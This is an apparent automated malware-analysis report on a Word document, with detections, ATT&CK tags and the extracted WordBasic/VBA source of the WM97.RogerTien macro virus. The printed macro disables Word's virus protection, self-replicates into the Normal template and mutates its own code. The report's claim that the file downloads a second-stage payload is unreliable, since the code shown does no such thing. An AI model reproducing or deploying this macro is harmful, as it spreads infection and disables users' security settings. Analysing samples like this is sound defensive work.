MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macros, specifically an AutoOpen macro, which is a strong indicator of malicious intent. The script attempts to disable macro security features and export a file named 'RogerTien.sys' to the C:\ drive, likely to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics 4
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4681 bytes |
SHA-256: 1964cf9809fd7884e06528b4b3f63c1d0191253299ff7b586ac4b3f70eabb5dc |
|||
|
Detection
ClamAV:
Doc.Trojan.Agnes-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "RogerTien"
Sub AzCpMx5511()
' -= [WM97.RogerTien] =-
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
s.VirusProtection = False
End With
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("RogerTien").CodeModule.ProcCountLines("AzCpMx5511", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("RogerTien").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
Call OfKoPl759
End Sub
Sub OfKoPl759()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Th1874()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("RogerTien").Export "C:\RogerTien.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.RogerTien" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 12094-Th-18745511-Hr.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "RogerTien" Then BmPkMr3950RnEuGe1874 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "RogerTien" Then CfAnHh759AzCpMx5511 = True
Next y
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = False Then Set NnPjVy8904OfKoPl148 = ActiveDocument.VBProject
If BmPkMr3950RnEuGe1874 = False And CfAnHh759AzCpMx5511 = True Then Set NnPjVy8904OfKoPl148 = NormalTemplate.VBProject
If BmPkMr3950RnEuGe1874 = True And CfAnHh759AzCpMx5511 = True Then GoTo Ende_
NnPjVy8904OfKoPl148.VBComponents.Import "C:\RogerTien.sys"
If CfAnHh759AzCpMx5511 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If BmPkMr3950RnEuGe1874 = False Then NormalTemplate.Save
Ende_:
Call AzCpMx5511
End Sub
Sub AutoOpen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExit()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoNew()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub AutoExec()
On Error Resume Next
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call Th1874
Call AzCpMx5511
End Sub
Sub DateiSchliesen()
On Error Resume Next
Call Th1874
Call AzCpMx5511
WordBasic.FileClose dlg
End Sub
Sub DateiSpeichern()
On Error Resume Next
Call Th1874
Call AzCpMx5511
ActiveDocument.Save
End Sub
Sub DateiSpeichernUnter()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub DateiDrucken()
On Error Resume Next
Call Th1874
Call AzCpMx5511
Dialogs(wdDialogFilePrint).Show
End Sub
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.